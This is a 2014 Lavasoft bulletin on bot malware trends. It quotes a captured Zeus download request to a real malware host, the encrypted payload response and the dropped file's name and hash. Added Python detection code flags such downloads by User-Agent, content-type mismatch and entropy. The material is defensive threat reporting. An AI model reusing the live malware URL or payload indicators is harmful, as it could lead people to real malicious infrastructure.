Lavasoft Security Bulletin - June 2014: Bot Review
Table: Bots under analysis (June 2014, Lavasoft MAS).

Bot's name | May 2014 | June 2014 | Changes
---|---|---|---
Zbot | 149 | 336 | 39.7%
Cycbot | 19 | 34 | 3.2%
Kelihos | 472 | 41 | -91.5%
NrgBot/Dorkbot | 169 | 55 | -24.2%
Blazebot/Rbot | 2 | 1 | -0.2%
Shiz | 6 | 4 | -0.4%
Total | 817 | 471 |
Bot distribution in June:
Kelihos. We saw a significant decrease in the Kelihos backdoors discovered in the Lab, from 58% of all bots in May to 9% in June.
Cycbot. You can find the latest description of Cycbot here.
Shiz. The latest example is here.
Zbot. This month Zeus takes the lead with more than 70% of all bots. See the report in the Malware Encyclopedia. 12% of all detected Zeus samples use a Tor client.
Zeus continues downloading its files in an encrypted form:
URL | IP
---|---
hxxp://thepristinehorizon.com/images/0403UKc.elf | (shown as an image in the original; not recoverable)

In this example it downloads a file with the extension .elf from a server in Atlanta, US (693594 bytes were transferred):
```text
GET /images/0403UKc.elf HTTP/1.1
Accept: text/*, application/*
User-Agent: Updates downloader
Host: thepristinehorizon.com
Cache-Control: no-cache

HTTP/1.1 200 OK
Date: Fri, 20 Jun 2014 08:30:31 GMT
Server: Apache/2.2.25 (Unix) mod_ssl/2.2.25 OpenSSL/1.0.0-fips mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Tue, 04 Mar 2014 08:01:31 GMT
ETag: "440923-7e8ee-4f3c34fe95e48"
Accept-Ranges: bytes
Content-Length: 518382
Content-Type: text/plain

ZZP..MN/.fNa..N...~.?.N...cc..JZ...b..Qbz.N..;o.......&...n...)...NB..
...nb..n...n...n&..n..v*...Ch...b..v....,..M`.5.a...&..Le..J`...,[.A.
..Ne...J..Lm..I...I0..&c...2..Nb..Jb(.....]...Ob..Gb..Fb..>cB..R@.^
<<< skipped >>>
```
A copy of the trojan was placed into the temp folder under the following name (MD5: 1fe01bf0357e8f40244e87a521e319c7, 23 094 bytes in size):

`%Temp%\opera_autoupdater.exe`
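The exchange above gives a defender three observable features of this Zeus download: the fixed User-Agent string "Updates downloader", a request for a `.elf` path that is answered with `Content-Type: text/plain`, and a response body that is ciphertext rather than text. The following Python is an added example, not code from Lavasoft or from the bulletin: it scores constructed proxy-log events on those three features, using the Shannon entropy of a body sample to flag encrypted payloads served under a text content type. The event records, the second hostname, the entropy threshold and the function names are assumptions made for the example.

```python
import math
from collections import Counter

# Constructed sample events (not from the bulletin), modelled on the capture above.
# A real feed would come from a proxy or IDS log; here they are embedded so the
# example runs offline.
SAMPLE_EVENTS = [
    {   # modelled on the Zeus request/response shown in the bulletin
        "host": "thepristinehorizon.com", "path": "/images/0403UKc.elf",
        "user_agent": "Updates downloader", "content_type": "text/plain",
        # constructed body: every byte value twice -> flat distribution, entropy 8.0
        "body_sample": bytes(range(256)) * 2,
    },
    {   # benign text served as text (hostname is an assumption)
        "host": "example.org", "path": "/robots.txt",
        "user_agent": "Mozilla/5.0 (Windows NT 6.1) Firefox/30.0",
        "content_type": "text/plain",
        "body_sample": b"User-agent: *\nDisallow: /admin/\n" * 8,
    },
    {   # a real ELF served with a binary content type: extension and type agree
        "host": "example.org", "path": "/downloads/tool.elf",
        "user_agent": "curl/7.37.0", "content_type": "application/octet-stream",
        "body_sample": b"\x7fELF" + bytes(28),
    },
]

# Indicators taken from the capture above; the threshold is an assumed tuning value.
SUSPICIOUS_USER_AGENTS = {"Updates downloader"}
ENTROPY_THRESHOLD = 7.0   # bits per byte; plain text normally sits well below 6


def shannon_entropy(data: bytes) -> float:
    """Bits of entropy per byte of `data`; 8.0 means a uniform byte distribution."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def score_event(event: dict) -> list:
    """Return the list of reasons this event looks like an encrypted-payload download."""
    reasons = []
    if event["user_agent"] in SUSPICIOUS_USER_AGENTS:
        reasons.append("user-agent matches the Zeus downloader string")

    path = event["path"]
    extension = path.rsplit(".", 1)[-1].lower() if "." in path else ""
    is_text = event["content_type"].lower().startswith("text/")
    if extension == "elf" and is_text:
        reasons.append("binary file extension served as text/*")

    entropy = shannon_entropy(event["body_sample"])
    if is_text and entropy > ENTROPY_THRESHOLD:
        reasons.append(f"text/* body has entropy {entropy:.2f}, likely encrypted")
    return reasons


def find_suspicious(events: list) -> list:
    """Pair each flagged URL with its reasons; events with no reasons are dropped."""
    flagged = []
    for event in events:
        reasons = score_event(event)
        if reasons:
            flagged.append((event["host"] + event["path"], reasons))
    return flagged


if __name__ == "__main__":
    for url, reasons in find_suspicious(SAMPLE_EVENTS):
        print(url)
        for reason in reasons:
            print("  -", reason)
```

The entropy check is what carries the detection when the User-Agent changes between builds: a `text/plain` response whose bytes are near-uniformly distributed is not text, whatever the headers claim, and the extension/content-type mismatch is a cheap second signal that survives a renamed path.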
NrgBot/Dorkbot. The number of Dorkbots has declined this month. You can find the latest description here. New samples carry the same malicious payload as last month's.
Blazebot/Rbot. The latest description is available in Malware Encyclopedia.
Read also:
Lavasoft Security Bulletin - June 2014: Top Threats.
Beware of FIFA World Cup 2014 Scams.